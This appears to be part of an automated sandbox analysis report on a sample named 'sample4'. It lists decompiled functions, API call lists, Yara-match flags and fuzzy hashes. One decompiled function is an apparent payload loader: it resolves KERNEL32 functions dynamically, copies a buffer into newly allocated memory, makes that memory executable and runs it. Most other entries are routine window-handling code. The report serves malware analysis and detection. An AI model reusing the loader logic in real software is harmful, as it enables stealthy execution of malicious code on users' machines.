                                                                                                                                                                                                                                                                					_t10 = HeapAlloc(GetProcessHeap(), 8, _t7 + 1);
                                                                                                                                                                                                                                                                					 *_t27 = _t10;
                                                                                                                                                                                                                                                                					if(_t10 != 0) {
                                                                                                                                                                                                                                                                						_v4 = _v4 & 0x00000000;
                                                                                                                                                                                                                                                                						if( *_t20 != 0) {
                                                                                                                                                                                                                                                                							_t11 = ReadFile(_t24, _t10,  *_t20,  &_v4, 0);
                                                                                                                                                                                                                                                                							asm("sbb eax, eax");
                                                                                                                                                                                                                                                                							_t13 =  ~_t11 & _v4;
                                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                                							_t13 = 0;
                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                						if(_t13 !=  *_t20) {
                                                                                                                                                                                                                                                                							_t26 = 0;
                                                                                                                                                                                                                                                                							if( *_t27 != 0) {
                                                                                                                                                                                                                                                                								HeapFree(GetProcessHeap(), 0,  *_t27);
                                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                                						_t26 = 0;
                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                                					 *_t27 =  *_t27 & _t7;
                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                				CloseHandle(_t24);
                                                                                                                                                                                                                                                                				return _t26;
                                                                                                                                                                                                                                                                			}













                                                                                                                                                                                                                                                                0x000d144c
                                                                                                                                                                                                                                                                0x000d144d
                                                                                                                                                                                                                                                                0x000d145c
                                                                                                                                                                                                                                                                0x000d1461
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x000d1463
                                                                                                                                                                                                                                                                0x000d1469
                                                                                                                                                                                                                                                                0x000d146f
                                                                                                                                                                                                                                                                0x000d1473
                                                                                                                                                                                                                                                                0x000d1477
                                                                                                                                                                                                                                                                0x000d1489
                                                                                                                                                                                                                                                                0x000d148f
                                                                                                                                                                                                                                                                0x000d1494
                                                                                                                                                                                                                                                                0x000d149a
                                                                                                                                                                                                                                                                0x000d14a2
                                                                                                                                                                                                                                                                0x000d14b3
                                                                                                                                                                                                                                                                0x000d14bb
                                                                                                                                                                                                                                                                0x000d14bd
                                                                                                                                                                                                                                                                0x000d14a4
                                                                                                                                                                                                                                                                0x000d14a4
                                                                                                                                                                                                                                                                0x000d14a4
                                                                                                                                                                                                                                                                0x000d14c3
                                                                                                                                                                                                                                                                0x000d14c5
                                                                                                                                                                                                                                                                0x000d14ca
                                                                                                                                                                                                                                                                0x000d14d7
                                                                                                                                                                                                                                                                0x000d14d7
                                                                                                                                                                                                                                                                0x000d14ca
                                                                                                                                                                                                                                                                0x000d1496
                                                                                                                                                                                                                                                                0x000d1496
                                                                                                                                                                                                                                                                0x000d1496
                                                                                                                                                                                                                                                                0x000d1479
                                                                                                                                                                                                                                                                0x000d1479
                                                                                                                                                                                                                                                                0x000d1479
                                                                                                                                                                                                                                                                0x000d14de
                                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,?,000D128D,?), ref: 000D1456
                                                                                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,000D128D,?), ref: 000D1469
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 000D14DE
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551228989.00000000000D1000.00000020.00020000.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.551211478.00000000000D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.551305946.00000000000D4000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d0000_sample4.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: File$CloseCreateHandleSize
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1378416451-0
                                                                                                                                                                                                                                                                • Opcode ID: 3daf484ac7fb521f5118b4b5c2d6d5f39d96bdf18e569da9fc4e4af81bcf6331
                                                                                                                                                                                                                                                                • Instruction ID: c47628d9dadf4193f0a57431d4f2d4e9876e476e61c1c654c4e393116931191c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3daf484ac7fb521f5118b4b5c2d6d5f39d96bdf18e569da9fc4e4af81bcf6331
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 14116072615311BFEB614F60EC88BBB7BA8FB45766F114626FE46D1180DB7488048A71
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000031), ref: 00147100
                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000032), ref: 0014710E
                                                                                                                                                                                                                                                                • SetRectEmpty.USER32(00289F9C), ref: 00147121
                                                                                                                                                                                                                                                                • EnumDisplayMonitors.USER32(00000000,00000000,00146F86,00289F9C), ref: 00147131
                                                                                                                                                                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,00289F9C,00000000), ref: 00147140
                                                                                                                                                                                                                                                                • SystemParametersInfoW.USER32(00001002,00000000,00289FC0,00000000), ref: 0014716D
                                                                                                                                                                                                                                                                • SystemParametersInfoW.USER32(00001012,00000000,00289FC4,00000000), ref: 00147181
                                                                                                                                                                                                                                                                • SystemParametersInfoW.USER32(0000100A,00000000,00289FD4,00000000), ref: 001471A7
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: System$InfoParameters$Metrics$DisplayEmptyEnumMonitorsRect
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2614369430-0
                                                                                                                                                                                                                                                                • Opcode ID: 3399a5fc96564e5685dad32ccedd07980a0ddd38d61ee8bc1ac60829e799f86c
                                                                                                                                                                                                                                                                • Instruction ID: 0e1443ce3b6b85c59559d8dd6d2247c81986419015a836d641047440a1eb5f51
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3399a5fc96564e5685dad32ccedd07980a0ddd38d61ee8bc1ac60829e799f86c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 742159B0601616BFE3059F71AC8CAE3BBACFF5A745F014229E548C6190DBB0A951CFA0
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 0012242F
                                                                                                                                                                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00122453
                                                                                                                                                                                                                                                                • UpdateWindow.USER32(?), ref: 0012246D
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000121,?,?), ref: 00122490
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000036A,00000000,?), ref: 001224A7
                                                                                                                                                                                                                                                                • UpdateWindow.USER32(?), ref: 001224F8
                                                                                                                                                                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00122540
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Message$PeekSendUpdateWindow$Parent
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2799049384-0
                                                                                                                                                                                                                                                                • Opcode ID: da597578b34b2257b81664a33e5e6090d0d8b70173c8baef1522015b44a64075
                                                                                                                                                                                                                                                                • Instruction ID: aa7b7e2266d96e4569e0813d88d7f37642e968f0b8016c893b9f7e6d9cc7d0c2
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: da597578b34b2257b81664a33e5e6090d0d8b70173c8baef1522015b44a64075
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C8419230B00265BBDB25AFA9EC89BADBBB4BF15750F108164F905A7191DBB4DD60CB80
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 0013B3E1
                                                                                                                                                                                                                                                                  • Part of subcall function 001768B8: __EH_prolog3.LIBCMT ref: 001768BF
                                                                                                                                                                                                                                                                  • Part of subcall function 0018FFEE: SetRectEmpty.USER32(?), ref: 00190029
                                                                                                                                                                                                                                                                • SetRectEmpty.USER32(?), ref: 0013B525
                                                                                                                                                                                                                                                                • SetRectEmpty.USER32 ref: 0013B536
                                                                                                                                                                                                                                                                • SetRectEmpty.USER32(?), ref: 0013B53D
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: EmptyRect$H_prolog3
                                                                                                                                                                                                                                                                • String ID: False$True
                                                                                                                                                                                                                                                                • API String ID: 3752103406-1895882422
                                                                                                                                                                                                                                                                • Opcode ID: 9dd41149bc8c8630ddbb6b587413103d5effadf38fedc2e934c10c9d46ab8d7e
                                                                                                                                                                                                                                                                • Instruction ID: 5a7eed1752c73d2955245816cb161c30f712924d29c38366b85d240b8b010b94
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9dd41149bc8c8630ddbb6b587413103d5effadf38fedc2e934c10c9d46ab8d7e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8C51D2B09157119FCB0ADF68D4857A8BBE8BF18700F1882BEA91D9B396CB741244CF65
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 0011970F: GetParent.USER32(?), ref: 0011975D
                                                                                                                                                                                                                                                                  • Part of subcall function 0011970F: GetLastActivePopup.USER32(?), ref: 00119770
                                                                                                                                                                                                                                                                  • Part of subcall function 0011970F: IsWindowEnabled.USER32(?), ref: 00119784
                                                                                                                                                                                                                                                                  • Part of subcall function 0011970F: EnableWindow.USER32(?,00000000), ref: 00119797
                                                                                                                                                                                                                                                                • EnableWindow.USER32(?,00000001), ref: 0011988D
                                                                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(?,?), ref: 001198A3
                                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 001198AD
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000376,00000000,00000000), ref: 001198C3
                                                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00119946
                                                                                                                                                                                                                                                                • MessageBoxW.USER32(?,?,?,?), ref: 00119968
                                                                                                                                                                                                                                                                • EnableWindow.USER32(00000000,00000001), ref: 0011998D
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$Enable$MessageProcess$ActiveCurrentEnabledFileLastModuleNameParentPopupSendThread
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1924968399-0
                                                                                                                                                                                                                                                                • Opcode ID: 07160c9ec0f4e672d28770f789df620730e3d172a455abb2d4a633e1e6aa03f6
                                                                                                                                                                                                                                                                • Instruction ID: fe82e45e9e838e7b8cd63ea7840a80dbe4c476c40b3862ca5c2d069d836ba4b8
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 07160c9ec0f4e672d28770f789df620730e3d172a455abb2d4a633e1e6aa03f6
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 85418075A4021D9BDB28AF64DC99BEEB3B8AB55700F1401BEE529D7250DB708EC08F60
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • LoadLibraryW.KERNEL32(000D13A8), ref: 00118685
                                                                                                                                                                                                                                                                  • Part of subcall function 0011844E: GetProcAddress.KERNEL32(?,?), ref: 0011847B
                                                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0011859F
                                                                                                                                                                                                                                                                • SetLastError.KERNEL32(0000006F), ref: 001185B3
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0011860A
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorLast$AddressFileLibraryLoadModuleNameProc
                                                                                                                                                                                                                                                                • String ID: $@
                                                                                                                                                                                                                                                                • API String ID: 3640817601-1077428164
                                                                                                                                                                                                                                                                • Opcode ID: 599d4ea3d6ac6da43dfb701032ce1fc160e99c2b4dd4a1d803083b457ab9e384
                                                                                                                                                                                                                                                                • Instruction ID: 41adee32aee09f7c92ea1f662666566c93bdf1e5fcff2955a7ee2f0c76cdabf9
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 599d4ea3d6ac6da43dfb701032ce1fc160e99c2b4dd4a1d803083b457ab9e384
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ED417570901214AADB389B649C8DBEE76B8AB54751F1482B6F918E61D0EF78CEC0CF11
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 001348FD
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000111,?,?), ref: 0013492A
                                                                                                                                                                                                                                                                • IsWindow.USER32(?), ref: 00134933
                                                                                                                                                                                                                                                                • IsWindow.USER32(?), ref: 00134955
                                                                                                                                                                                                                                                                • ReleaseCapture.USER32 ref: 00134967
                                                                                                                                                                                                                                                                • KillTimer.USER32(?,0000EC0D), ref: 00134983
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 001349A3
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSendWindow$CaptureKillParentReleaseTimer
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3338874567-0
                                                                                                                                                                                                                                                                • Opcode ID: 06df80d3c43e4ba047dda4f5db922db044d6c86898ba151dcdaa8afaadcf0d1b
                                                                                                                                                                                                                                                                • Instruction ID: f83dfa6e97ac1fe6479ed3c120258520b72c24c201c870ba6209798036af1f37
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 06df80d3c43e4ba047dda4f5db922db044d6c86898ba151dcdaa8afaadcf0d1b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 60316030702622FFD7299B75DC48BAAFB69FF49B01F00422AF54992150CB70A850CFE1
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                C-Code - Quality: 39%
                                                                                                                                                                                                                                                                			E000D1000(void* __ecx, void* __edx) {
                                                                                                                                                                                                                                                                				char _v296;
                                                                                                                                                                                                                                                                				intOrPtr _v300;
                                                                                                                                                                                                                                                                				signed int _v304;
                                                                                                                                                                                                                                                                				char _v308;
                                                                                                                                                                                                                                                                				void* _t20;
                                                                                                                                                                                                                                                                				_Unknown_base(*)()* _t23;
                                                                                                                                                                                                                                                                				_Unknown_base(*)()* _t27;
                                                                                                                                                                                                                                                                				intOrPtr* _t40;
                                                                                                                                                                                                                                                                				intOrPtr _t42;
                                                                                                                                                                                                                                                                				intOrPtr _t43;
                                                                                                                                                                                                                                                                				intOrPtr* _t46;
                                                                                                                                                                                                                                                                				intOrPtr* _t49;
                                                                                                                                                                                                                                                                				void* _t51;
                                                                                                                                                                                                                                                                				void* _t56;
                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                				_t51 = __ecx;
                                                                                                                                                                                                                                                                				_t42 =  *((intOrPtr*)(__ecx + 5));
                                                                                                                                                                                                                                                                				if( *((intOrPtr*)(__ecx + 1)) + _t42 > __edx) {
                                                                                                                                                                                                                                                                					L10:
                                                                                                                                                                                                                                                                					_t20 = 0;
                                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                                					_t40 = _t42 + __ecx;
                                                                                                                                                                                                                                                                					_t23 = GetProcAddress(LoadLibraryA("KERNEL32.DLL"), __ecx + 0x1e);
                                                                                                                                                                                                                                                                					if(_t23 == 0) {
                                                                                                                                                                                                                                                                						goto L10;
                                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                                						_t49 =  *_t23(0,  *((intOrPtr*)(_t51 + 9)), 0x3000, 4);
                                                                                                                                                                                                                                                                						if(_t49 == 0) {
                                                                                                                                                                                                                                                                							goto L10;
                                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                                							_t43 =  *((intOrPtr*)(_t51 + 9));
                                                                                                                                                                                                                                                                							_t46 = _t40;
                                                                                                                                                                                                                                                                							if(_t40 != 0 && _t43 != 0) {
                                                                                                                                                                                                                                                                								_t56 = _t49 - _t40;
                                                                                                                                                                                                                                                                								do {
                                                                                                                                                                                                                                                                									 *((char*)(_t46 + _t56)) =  *_t46;
                                                                                                                                                                                                                                                                									_t46 = _t46 + 1;
                                                                                                                                                                                                                                                                									_t43 = _t43 - 1;
                                                                                                                                                                                                                                                                								} while (_t43 != 0);
                                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                                							_t27 = GetProcAddress(LoadLibraryA("KERNEL32.DLL"), _t51 + 0x2e);
                                                                                                                                                                                                                                                                							if(_t27 == 0) {
                                                                                                                                                                                                                                                                								goto L10;
                                                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                                                								_push( &_v296);
                                                                                                                                                                                                                                                                								_push(0x20);
                                                                                                                                                                                                                                                                								_push( *((intOrPtr*)(_t51 + 9)));
                                                                                                                                                                                                                                                                								_push(_t49);
                                                                                                                                                                                                                                                                								if( *_t27() == 0) {
                                                                                                                                                                                                                                                                									goto L10;
                                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                                									_v304 = _v304 & 0x00000000;
                                                                                                                                                                                                                                                                									_v308 =  *((intOrPtr*)(_t51 + 9)) + _t40;
                                                                                                                                                                                                                                                                									_v300 =  *0xd3000;
                                                                                                                                                                                                                                                                									GetModuleFileNameA(0,  &_v296, 0x104);
                                                                                                                                                                                                                                                                									 *_t49( &_v308);
                                                                                                                                                                                                                                                                									_t20 = 1;
                                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                				return _t20;
                                                                                                                                                                                                                                                                			}

















                                                                                                                                                                                                                                                                0x000d100f
                                                                                                                                                                                                                                                                0x000d1015
                                                                                                                                                                                                                                                                0x000d101c
                                                                                                                                                                                                                                                                0x000d10d3
                                                                                                                                                                                                                                                                0x000d10d3
                                                                                                                                                                                                                                                                0x000d1022
                                                                                                                                                                                                                                                                0x000d102b
                                                                                                                                                                                                                                                                0x000d1035
                                                                                                                                                                                                                                                                0x000d103d
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x000d1043
                                                                                                                                                                                                                                                                0x000d1051
                                                                                                                                                                                                                                                                0x000d1055
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x000d1057
                                                                                                                                                                                                                                                                0x000d1057
                                                                                                                                                                                                                                                                0x000d105a
                                                                                                                                                                                                                                                                0x000d105e
                                                                                                                                                                                                                                                                0x000d1066
                                                                                                                                                                                                                                                                0x000d1068
                                                                                                                                                                                                                                                                0x000d106a
                                                                                                                                                                                                                                                                0x000d106d
                                                                                                                                                                                                                                                                0x000d106e
                                                                                                                                                                                                                                                                0x000d106e
                                                                                                                                                                                                                                                                0x000d1068
                                                                                                                                                                                                                                                                0x000d1083
                                                                                                                                                                                                                                                                0x000d108b
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x000d108d
                                                                                                                                                                                                                                                                0x000d1091
                                                                                                                                                                                                                                                                0x000d1092
                                                                                                                                                                                                                                                                0x000d1094
                                                                                                                                                                                                                                                                0x000d1097
                                                                                                                                                                                                                                                                0x000d109c
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x000d109e
                                                                                                                                                                                                                                                                0x000d10a1
                                                                                                                                                                                                                                                                0x000d10a8
                                                                                                                                                                                                                                                                0x000d10b1
                                                                                                                                                                                                                                                                0x000d10c1
                                                                                                                                                                                                                                                                0x000d10cc
                                                                                                                                                                                                                                                                0x000d10d0
                                                                                                                                                                                                                                                                0x000d10d0
                                                                                                                                                                                                                                                                0x000d109c
                                                                                                                                                                                                                                                                0x000d108b
                                                                                                                                                                                                                                                                0x000d1055
                                                                                                                                                                                                                                                                0x000d103d
                                                                                                                                                                                                                                                                0x000d10dc

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(KERNEL32.DLL,?,00000400,?), ref: 000D102E
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 000D1035
                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(KERNEL32.DLL,?), ref: 000D107C
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 000D1083
                                                                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 000D10C1
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551228989.00000000000D1000.00000020.00020000.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.551211478.00000000000D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.551305946.00000000000D4000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d0000_sample4.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AddressLibraryLoadProc$FileModuleName
                                                                                                                                                                                                                                                                • String ID: KERNEL32.DLL
                                                                                                                                                                                                                                                                • API String ID: 2206896924-2576044830
                                                                                                                                                                                                                                                                • Opcode ID: 46dc2641d0e0fb71b6c5f335156084aa43571b739df4811111e69d101be45401
                                                                                                                                                                                                                                                                • Instruction ID: bb8d93d7620af67584e34147c5fbe5ad97224681aa2692bc7fb7d8fb8de18eff
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 46dc2641d0e0fb71b6c5f335156084aa43571b739df4811111e69d101be45401
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CA21C7726043456BE320AFA5DC45BA7BFECEB48701F00452AFB59CA681EAB5E9048771
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RealChildWindowFromPoint.USER32(?,?,?), ref: 0012697F
                                                                                                                                                                                                                                                                • ClientToScreen.USER32(?,?), ref: 0012699A
                                                                                                                                                                                                                                                                • GetWindow.USER32(?,00000005), ref: 001269A3
                                                                                                                                                                                                                                                                • GetDlgCtrlID.USER32(00000000), ref: 001269B3
                                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 001269E1
                                                                                                                                                                                                                                                                • PtInRect.USER32(?,?,?), ref: 001269F1
                                                                                                                                                                                                                                                                • GetWindow.USER32(00000000,00000002), ref: 00126A00
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$Rect$ChildClientCtrlFromPointRealScreen
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3369362809-0
                                                                                                                                                                                                                                                                • Opcode ID: b42c10b9396cbc010e5731c93ca8cf990432303a281915c14bf485bc6c9d9534
                                                                                                                                                                                                                                                                • Instruction ID: 6683884ea9303b036a066c3ef1107164f7a03670b1f9ad527173f061793bd9f2
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b42c10b9396cbc010e5731c93ca8cf990432303a281915c14bf485bc6c9d9534
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4A21747190122AAFCB11AFA8EC489AFB7BCEF46710B154129F911E3290DF74DD55CB90
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                                • API String ID: 0-537541572
                                                                                                                                                                                                                                                                • Opcode ID: 2cc155fe5a59c745caffe820f4fcb84501ebfecf3cb453510788f50a16c1b563
                                                                                                                                                                                                                                                                • Instruction ID: 2e728feba69060ebb8426cc621068f4b2a832aaba1b8044e7eb99ddc1583e368
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2cc155fe5a59c745caffe820f4fcb84501ebfecf3cb453510788f50a16c1b563
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 95210A32A25312BFDB219FB4EC45B2A37589F51B62F310561ED05FB290FAB0DC1896D8
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 0011E565
                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 0011E589
                                                                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 0011E596
                                                                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 0011E5A3
                                                                                                                                                                                                                                                                • EqualRect.USER32(?,?), ref: 0011E5AE
                                                                                                                                                                                                                                                                • DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000014), ref: 0011E5D5
                                                                                                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 0011E5DF
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$ClientRectScreen$DeferEqualParent
